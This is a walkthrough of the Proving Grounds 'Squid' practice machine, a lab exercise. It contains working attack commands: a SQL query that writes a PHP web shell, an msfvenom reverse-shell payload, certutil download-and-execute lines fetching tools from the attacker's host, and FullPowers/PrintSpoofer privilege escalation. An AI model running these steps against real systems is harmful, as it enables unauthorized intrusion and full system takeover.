PG - Squid

PG – Squid

In this walk through, we will be going through the Squid room from Proving Grounds. This room is rated as Easy on the platform and it consist of enumeration of Squid Proxy in order to get the initial foothold on the target. For the privilege escalation, Fullpowerexploit is used in conjunction of the SeImpersonatePrivilege abuse to get root. So, let’s get started without any delay.

Squid

Machine Info:

TitleSquid
IPaddress192.168.166.189
DifficultyEasy
OSWindows
DescriptionSquid is an Easy rated Windows machine that requires enumeration of Squid Proxy in order to get the initial foothold on the target. For the privilege escalation, Fullpowerexploit is used in conjunction of the SeImpersonatePrivilege abuse.

Enumeration:

  • I started off with a regular aggressive nmap scan and only 4 ports opened – 135 (RPC), 139,445 (SMB) and 3128 (HTTP-Proxy).

$ sudo nmap -A 192.168.166.189
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-11 22:10 IST

Nmap scan report for 192.168.166.189
Host is up (0.19s latency).
Not shown: 996 filtered ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn?
445/tcp  open  microsoft-ds?
3128/tcp open  http-proxy    Squid http proxy 4.14
|_http-server-header: squid/4.14
|_http-title: ERROR: The requested URL could not be retrieved
| vulners: 
|   cpe:/a:squid-cache:squid:4.14: 
|     	PRION:CVE-2021-28651	5.0	https://vulners.com/prion/PRION:CVE-2021-28651
|     	CVE-2021-28651	5.0	https://vulners.com/cve/CVE-2021-28651
|     	CVE-2020-25097	5.0	https://vulners.com/cve/CVE-2020-25097
|     	PRION:CVE-2021-28662	4.3	https://vulners.com/prion/PRION:CVE-2021-28662
|     	PRION:CVE-2021-28116	4.3	https://vulners.com/prion/PRION:CVE-2021-28116
|     	CVE-2021-28662	4.3	https://vulners.com/cve/CVE-2021-28662
|     	CVE-2021-28116	4.3	https://vulners.com/cve/CVE-2021-28116
|     	PRION:CVE-2022-41317	4.0	https://vulners.com/prion/PRION:CVE-2022-41317
|     	PRION:CVE-2021-46784	4.0	https://vulners.com/prion/PRION:CVE-2021-46784
|     	PRION:CVE-2021-33620	4.0	https://vulners.com/prion/PRION:CVE-2021-33620
|     	PRION:CVE-2021-31808	4.0	https://vulners.com/prion/PRION:CVE-2021-31808
|     	PRION:CVE-2021-31807	4.0	https://vulners.com/prion/PRION:CVE-2021-31807
|     	PRION:CVE-2021-31806	4.0	https://vulners.com/prion/PRION:CVE-2021-31806
|     	PRION:CVE-2021-28652	4.0	https://vulners.com/prion/PRION:CVE-2021-28652
|     	MSF:AUXILIARY-DOS-HTTP-SQUID_RANGE_DOS-	4.0	https://vulners.com/metasploit/MSF:AUXILIARY-DOS-HTTP-SQUID_RANGE_DOS-	*EXPLOIT*
|     	CVE-2022-41317	4.0	https://vulners.com/cve/CVE-2022-41317
|     	CVE-2021-46784	4.0	https://vulners.com/cve/CVE-2021-46784
|     	CVE-2021-33620	4.0	https://vulners.com/cve/CVE-2021-33620
|     	CVE-2021-31808	4.0	https://vulners.com/cve/CVE-2021-31808
|     	CVE-2021-31807	4.0	https://vulners.com/cve/CVE-2021-31807
|     	CVE-2021-31806	4.0	https://vulners.com/cve/CVE-2021-31806
|_    	CVE-2021-28652	4.0	https://vulners.com/cve/CVE-2021-28652
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port139-TCP:V=7.80%I=7%D=2/11%Time=65C8F8BE%P=x86_64-pc-linux-gnu%r(Get
SF:Request,5,"\x83\0\0\x01\x8f")%r(GenericLines,5,"\x83\0\0\x01\x8f")%r(HT
SF:TPOptions,5,"\x83\0\0\x01\x8f")%r(RTSPRequest,5,"\x83\0\0\x01\x8f")%r(R
SF:PCCheck,5,"\x83\0\0\x01\x8f")%r(DNSVersionBindReqTCP,5,"\x83\0\0\x01\x8
SF:f")%r(DNSStatusRequestTCP,5,"\x83\0\0\x01\x8f")%r(Help,5,"\x83\0\0\x01\
SF:x8f")%r(SSLSessionReq,5,"\x83\0\0\x01\x8f")%r(TerminalServerCookie,5,"\
SF:x83\0\0\x01\x8f")%r(TLSSessionReq,5,"\x83\0\0\x01\x8f")%r(Kerberos,5,"\
SF:x83\0\0\x01\x8f")%r(X11Probe,5,"\x83\0\0\x01\x8f")%r(FourOhFourRequest,
SF:5,"\x83\0\0\x01\x8f")%r(LPDString,5,"\x83\0\0\x01\x8f")%r(LDAPSearchReq
SF:,5,"\x83\0\0\x01\x8f")%r(LDAPBindReq,5,"\x83\0\0\x01\x8f")%r(SIPOptions
SF:,5,"\x83\0\0\x01\x8f")%r(LANDesk-RC,5,"\x83\0\0\x01\x8f")%r(TerminalSer
SF:ver,5,"\x83\0\0\x01\x8f")%r(NCP,5,"\x83\0\0\x01\x8f")%r(NotesRPC,5,"\x8
SF:3\0\0\x01\x8f")%r(JavaRMI,5,"\x83\0\0\x01\x8f")%r(WMSRequest,5,"\x83\0\
SF:0\x01\x8f")%r(oracle-tns,5,"\x83\0\0\x01\x8f")%r(ms-sql-s,5,"\x83\0\0\x
SF:01\x8f")%r(afp,5,"\x83\0\0\x01\x8f")%r(giop,5,"\x83\0\0\x01\x8f");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized
Running (JUST GUESSING): AVtech embedded (87%)
Aggressive OS guesses: AVtech Room Alert 26W environmental monitor (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-02-11T16:42:21
|_  start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   182.09 ms 192.168.45.1
2   182.11 ms 192.168.45.254
3   182.12 ms 192.168.251.1
4   182.70 ms 192.168.166.189

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 166.15 seconds

nmap scan

Host script results

  • Started my enumeration with SMB using smbclient and smbmap. Found nothing back.

smbclient -L 192.168.166.189

smbmap -H 192.168.166.189

SMB Enumeration

  • Next, Enumerated the HTTP web proxy on 3128 which was apparently running the Squid proxy as per the nmap results.

Squid proxy running

SPOSE Scanner

  • I looked online how we can use the Squid proxy to our advantage and found out a scanner related to that. So, downloaded the scanner script on my system and use it enumerate the open ports in target’s internal network. Found two ports opened – 3306 and 8080.

Resource: https://github.com/aancw/spose

git clone https://github.com/aancw/spose.git

cd spose

python3 spose.py --proxy http://192.168.166.189:3128 --target 192.168.166.189:3128

python3 spose.py --proxy http://192.168.166.189:3128 --target 192.168.166.189

spose.py result

  • In order to access the HTTP port, we can add the Squid Proxy details in our FoxyProxy configuration.

FoxyProxy configuration

  • By navigating to the below URL, we can access the WampServer running on the internal port 8080.

http://192.168.166.189:8080/

WampServer running

  • Let’s perform a directory bruteforcing using the proxy on the target port 8080. Found bunch of files in the result, but the interesting one was phpmyadmin.

feroxbuster -u http://192.168.166.189:8080/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt -p 192.168.166.189:3128

Ferricoxide result

  • Accessed the phpmyadmin instance and logged into the backend using the default root username and blank password.

phpmyadmin login panel

phpmyadmin backend

Initial Access:

  • Next, i used the below command to add a PHP web shell on the target.

select "<?php echo system($_GET['c']);?>" into OUTFILE 'C:/wamp/www/shell.php'

writing the shell.php

  • We can now access the web shell using the below URL.

http://192.168.166.189:8080/shell.php?c=whoami

nt authority\local service

  • In order to interact with the target properly, we first have to stabilize our shell access. For that, create an reverse shell executable using msfvenom.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.196 LPORT=4444 -f exe > shell.exe

created payload shell.exe

  • Download it on to the target using certutil and execute it to get a connection back at our netcat listener.

http://192.168.166.189:8080/shell.php?c=certutil.exe -urlcache -f http://192.168.45.196:8000/shell.exe shell.exe

downloading shell.exe

python HTTP server

http://192.168.166.189:8080/shell.php?c=shell.exe

executing shell.exe

got initial access

  • Captured the local flag.

local flag

Privilege Escalation:

Fullpower exploit

  • At this point, i was pretty lost what to do next in order to get root. Upon, searching on ways to elevate privileges from a local service account to SYSTEM. I came accross the below exploit. This tool will automatically set the SeAssignPrimaryToken and SeImpersonate privileges to the service account making it vulnerable to other privilege escalation attacks.

Exploit: https://github.com/itm4n/FullPowers.git

  • Downloaded the exploit on to the target using certutil and then executed it.

http://192.168.166.189:8080/shell.php?c=certutil.exe -urlcache -f http://192.168.45.196:8000/FullPowers.exe FullPowers.exe

FullPowers exploit

  • Once the execution is completed, we can see a number of Privileges assigned to us. Nice!

FullPowers.exe

whoami /all

firing FullPowers.exe

SeImpersonatePrivilege

  • Next, i used the PrintSpoofer exploit in order to exploit the SeImpersonatePrivilege and get shell access as SYSTEM.

Exploit: https://github.com/itm4n/PrintSpoofer/releases

http://192.168.166.189:8080/shell.php?c=certutil.exe -urlcache -f http://192.168.45.196:8000/PrintSpoofer64.exe Printspoofer.exe

Printspoofer.exe -i c cmd

firing PrintSpoofer exploit

  • Captured the root flag and marked the machine as complete.

proof flag

Also Read: PG – Resourced

Conclusion:

Conclusion

So that was “Squid” for you. We started off with a regular nmap scan and found 4 ports opened – 135 (RPC), 139,445 (SMB) and 3128 (HTTP-Proxy). Enumerated the web server on port 3128 which was running the Squid proxy. Used spose scanner to find open ports in internal network, found two ports – 3306 and 8080. Accessed the webserver on port 8080 and performed some enumeration with ferricoxide where we found a phpmyadmin installation. Further, abused phpmyadmin to write a webshell on the target server. Thus, getting initial access. For the privilege escalation, Fullpowerexploit is used in conjunction of the SeImpersonatePrivilege abuse to get root. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top